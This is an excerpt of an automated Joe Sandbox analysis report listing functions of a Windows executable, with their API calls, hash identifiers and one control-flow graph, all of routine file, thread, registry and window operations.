                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                        • String ID: EDIT
                                                                                        • API String ID: 4243998846-3080729518
                                                                                        • Opcode ID: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                                                                        • Instruction ID: b079403b025e0d9b583a1fdfa45a8c02897cbb6a57d11d9ec0998d0d3ffb9923
                                                                                        • Opcode Fuzzy Hash: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                                                                        • Instruction Fuzzy Hash: 37014F61F18A4281FB20DB23B8107F66791AFF8B40F440131E96EC66E5FE2CE18DC640
                                                                                        Function 00007FF6FE192CE0 Relevance: 6.1, APIs: 4, Instructions: 136fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 4292 7ff6fe192ce0-7ff6fe192d0a 4293 7ff6fe192d13-7ff6fe192d1b 4292->4293 4294 7ff6fe192d0c-7ff6fe192d0e 4292->4294 4295 7ff6fe192d2b 4293->4295 4296 7ff6fe192d1d-7ff6fe192d28 GetStdHandle 4293->4296 4297 7ff6fe192ea9-7ff6fe192ec4 call 7ff6fe1b2320 4294->4297 4298 7ff6fe192d31-7ff6fe192d3d 4295->4298 4296->4295 4300 7ff6fe192d3f-7ff6fe192d44 4298->4300 4301 7ff6fe192d86-7ff6fe192da2 WriteFile 4298->4301 4303 7ff6fe192daf-7ff6fe192db3 4300->4303 4304 7ff6fe192d46-7ff6fe192d7a WriteFile 4300->4304 4305 7ff6fe192da6-7ff6fe192da9 4301->4305 4307 7ff6fe192ea2-7ff6fe192ea6 4303->4307 4308 7ff6fe192db9-7ff6fe192dbd 4303->4308 4304->4305 4306 7ff6fe192d7c-7ff6fe192d82 4304->4306 4305->4303 4305->4307 4306->4304 4309 7ff6fe192d84 4306->4309 4307->4297 4308->4307 4310 7ff6fe192dc3-7ff6fe192dd8 call 7ff6fe18b4f8 4308->4310 4309->4305 4313 7ff6fe192e1e-7ff6fe192e6d call 7ff6fe1b797c call 7ff6fe18129c call 7ff6fe18bca8 4310->4313 4314 7ff6fe192dda-7ff6fe192de1 4310->4314 4313->4307 4325 7ff6fe192e6f-7ff6fe192e86 4313->4325 4314->4298 4316 7ff6fe192de7-7ff6fe192de9 4314->4316 4316->4298 4317 7ff6fe192def-7ff6fe192e19 4316->4317 4317->4298 4326 7ff6fe192e88-7ff6fe192e9b 4325->4326 4327 7ff6fe192e9d call 7ff6fe1b220c 4325->4327 4326->4327 4328 7ff6fe192ec5-7ff6fe192ecb call 7ff6fe1b7904 4326->4328 4327->4307
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite$Handle
                                                                                        • String ID:
                                                                                        • API String ID: 4209713984-0
                                                                                        • Opcode ID: c0878563cb540de980db5307815f43949119fc8f7ca07e724854b0feeef95fd0
                                                                                        • Instruction ID: 0b65779aff5cdd9ff988742aa83038861d667f856e0248e4d44d35e8dda70c43
                                                                                        • Opcode Fuzzy Hash: c0878563cb540de980db5307815f43949119fc8f7ca07e724854b0feeef95fd0
                                                                                        • Instruction Fuzzy Hash: EC51B362F1964252FB50CB26E4447BE6B90BBE5B94F541131FA2E87AD8EF7CE485C300
                                                                                        Function 00007FF6FE1B03E0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$TextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2912839123-0
                                                                                        • Opcode ID: 82d20ed81ead71c6a2595868c689d656b3dfef2fae7ade5912c5b966e821e875
                                                                                        • Instruction ID: 839a8a5ae1769b0ab1b18c4df19d63d16c52429dd1c40fbd5c6f73c894e64dca
                                                                                        • Opcode Fuzzy Hash: 82d20ed81ead71c6a2595868c689d656b3dfef2fae7ade5912c5b966e821e875
                                                                                        • Instruction Fuzzy Hash: F85193A2F1465284FB00DBA6D8452AD2722AFE5BA4F500635FA3D96BE5FF6CE544C300
                                                                                        Function 00007FF6FE1B2D6C Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                        • String ID:
                                                                                        • API String ID: 1452418845-0
                                                                                        • Opcode ID: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
                                                                                        • Instruction ID: 4c84f2dd840be902f139ea66633cc8c6b7bc6fac056b5823674afc175e6f0144
                                                                                        • Opcode Fuzzy Hash: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
                                                                                        • Instruction Fuzzy Hash: 27310621E0824282FB54EB6794513BA2A91AFE5384F440434FA6ECB7D3FE6CB849C251
                                                                                        Function 00007FF6FE193684 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 2359106489-0
                                                                                        • Opcode ID: 623c7cdad90b96bec9a950f5b6d0d98be22cc1c56ccb42caf94d3fb3334d27cf
                                                                                        • Instruction ID: ee5ef96d7f2aa36bd6957c878b868a222db494ba19558a9d07e060973999475a
                                                                                        • Opcode Fuzzy Hash: 623c7cdad90b96bec9a950f5b6d0d98be22cc1c56ccb42caf94d3fb3334d27cf
                                                                                        • Instruction Fuzzy Hash: DD319266E0C68241EB24DB27A48427E6761BFE97A0F540231FEADC37D9EF3CE5458600
                                                                                        Function 00007FF6FE192320 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$FileHandleRead
                                                                                        • String ID:
                                                                                        • API String ID: 2244327787-0
                                                                                        • Opcode ID: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
                                                                                        • Instruction ID: a44b4d8f8bd4970b9bd440d27087c792e8b7e4ce12fe23bd2eddc1dbfa058e76
                                                                                        • Opcode Fuzzy Hash: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
                                                                                        • Instruction Fuzzy Hash: F7216D22E1854281FB60DB13B40023D6BA0BBE9B94F144530EA6DC76C8EF6CEA85C751
                                                                                        Function 00007FF6FE19E948 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF6FE19ECD8: ResetEvent.KERNEL32 ref: 00007FF6FE19ECF1
                                                                                          • Part of subcall function 00007FF6FE19ECD8: ReleaseSemaphore.KERNEL32 ref: 00007FF6FE19ED07
                                                                                        • ReleaseSemaphore.KERNEL32 ref: 00007FF6FE19E974
                                                                                        • CloseHandle.KERNELBASE ref: 00007FF6FE19E993
                                                                                        • DeleteCriticalSection.KERNEL32 ref: 00007FF6FE19E9AA
                                                                                        • CloseHandle.KERNEL32 ref: 00007FF6FE19E9B7
                                                                                          • Part of subcall function 00007FF6FE19EA5C: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF6FE19E95F,?,?,?,00007FF6FE19463A,?,?,?), ref: 00007FF6FE19EA63
                                                                                          • Part of subcall function 00007FF6FE19EA5C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6FE19E95F,?,?,?,00007FF6FE19463A,?,?,?), ref: 00007FF6FE19EA6E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                        • String ID:
                                                                                        • API String ID: 502429940-0
                                                                                        • Opcode ID: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
                                                                                        • Instruction ID: cfd8db01ffbd9bc483ef5db3fc6b039e75e2431c71645652b61996eba645b1a4
                                                                                        • Opcode Fuzzy Hash: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
                                                                                        • Instruction Fuzzy Hash: 6301E133E14A9196E744DB26D9842AE6761FBD4B90F004031EB6E836A5DF39F4B58740
                                                                                        Function 00007FF6FE19EAA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$CreatePriority
                                                                                        • String ID: CreateThread failed
                                                                                        • API String ID: 2610526550-3849766595
                                                                                        • Opcode ID: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
                                                                                        • Instruction ID: e1c068b918463419ed8b91d0633b98c177b3dce709d677289d4f896843b87715
                                                                                        • Opcode Fuzzy Hash: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
                                                                                        • Instruction Fuzzy Hash: 95118231E08A4281E710DF16E8811AE7BA1FBE4784F544131FA6E826A8FF3CE546C740
                                                                                        Function 00007FF6FE1A946C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: DirectoryInitializeMallocSystem
                                                                                        • String ID: riched20.dll
                                                                                        • API String ID: 174490985-3360196438
                                                                                        • Opcode ID: b1936b3f38021c99ecd6522b050f6163774a90ef7a51b133bb98bdb322c125e4
                                                                                        • Instruction ID: dadd1a0044ae88fab41caf01918e519359d11ae04ae0c559e5f82cb851f9ef9d
                                                                                        • Opcode Fuzzy Hash: b1936b3f38021c99ecd6522b050f6163774a90ef7a51b133bb98bdb322c125e4
                                                                                        • Instruction Fuzzy Hash: F9F03171A18A4182E701DF61F81516EBBA0FBD8754F440135F59D82B94EFBCE15DCB00
                                                                                        Function 00007FF6FE1A095C Relevance: 4.7, APIs: 3, Instructions: 152windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF6FE1A853C: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF6FE1A856C
                                                                                          • Part of subcall function 00007FF6FE19AAE0: LoadStringW.USER32 ref: 00007FF6FE19AB67
                                                                                          • Part of subcall function 00007FF6FE19AAE0: LoadStringW.USER32 ref: 00007FF6FE19AB80
                                                                                          • Part of subcall function 00007FF6FE181FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6FE181FFB
                                                                                          • Part of subcall function 00007FF6FE18129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6FE181396
                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6FE1B01BB
                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6FE1B01C1
                                                                                        • SendDlgItemMessageW.USER32 ref: 00007FF6FE1B01F2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
                                                                                        • String ID:
                                                                                        • API String ID: 3106221260-0
                                                                                        • Opcode ID: 48f7460856490a08a1dfbaf42e0e8179e100db638ce86cb13893e8b540cb7b7b
                                                                                        • Instruction ID: 8eb160bf6a8ea154f73ed63675bce16e7eee514476e7e380ff486fca50d4c38e
                                                                                        • Opcode Fuzzy Hash: 48f7460856490a08a1dfbaf42e0e8179e100db638ce86cb13893e8b540cb7b7b
                                                                                        • Instruction Fuzzy Hash: 2651A062F0564286FB10DBA6D4452FD2722ABE9BD4F500236FE2D977DAEE2CE505C340
                                                                                        Function 00007FF6FE1AA834 Relevance: 4.6, APIs: 3, Instructions: 133registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpen
                                                                                        • String ID:
                                                                                        • API String ID: 47109696-0
                                                                                        • Opcode ID: 0f06b49406f4057e3343d9a592e31a84ef821720d6a629a1401e68756b981839
                                                                                        • Instruction ID: e1484e85f982df5d18daf4bb0f6f2d63c1d49239a4c716789aec42528954f0d0
                                                                                        • Opcode Fuzzy Hash: 0f06b49406f4057e3343d9a592e31a84ef821720d6a629a1401e68756b981839
                                                                                        • Instruction Fuzzy Hash: 4F51A272F14A0685EB20CF66D8442BD2771FB98BC8B044635EF6D93B98EE38D185C740
                                                                                        Function 00007FF6FE181744 Relevance: 4.6, APIs: 3, Instructions: 118COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Concurrency::cancel_current_task__std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 2371198981-0
                                                                                        • Opcode ID: c8b991f6ad29d02e2a9234a5c117321120c7b256ccc0562f874d361185e6e539
                                                                                        • Instruction ID: 716aee659f2bdf65c4226877bd02c7bd3dfb9572af00c3deb8c272b998fde11f
                                                                                        • Opcode Fuzzy Hash: c8b991f6ad29d02e2a9234a5c117321120c7b256ccc0562f874d361185e6e539
                                                                                        • Instruction Fuzzy Hash: D7411E62F0864581EB04DB13E54027AA766EBA4BE0F044632EE7C8BBD5EF7CE195C304
                                                                                        Function 00007FF6FE192134 Relevance: 4.6, APIs: 3, Instructions: 114fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 2272807158-0
                                                                                        • Opcode ID: fadebd8b54f10f1951c29d3e9f7df512abc916790a43b14df76b265dc45515ba
                                                                                        • Instruction ID: 93fc3661bc37395e4584981dd9c6d52cfdda4fed79d019058cf5fb53cd435761
                                                                                        • Opcode Fuzzy Hash: fadebd8b54f10f1951c29d3e9f7df512abc916790a43b14df76b265dc45515ba
                                                                                        • Instruction Fuzzy Hash: CD418062E1868182EB24CB16F44426D6BA1FBD57B4F105335EBBD47AD9EF3CE4A4C600
                                                                                        Function 00007FF6FE1823F8 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 2176759853-0
                                                                                        • Opcode ID: 107cbe78643896cd277503af9d79c84134f19e12336bfdef765791961383781f
                                                                                        • Instruction ID: 7e2a53bb773c19833da40f80707f3f7e84a2f32c9abfe2432bee8e1e4d46e97c
                                                                                        • Opcode Fuzzy Hash: 107cbe78643896cd277503af9d79c84134f19e12336bfdef765791961383781f
                                                                                        • Instruction Fuzzy Hash: A9218162E18B8181EB10CB66A84016AA765FBD9BD0F145235FAAD43BD5EF3CD140C700
                                                                                        Function 00007FF6FE1A1F94 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
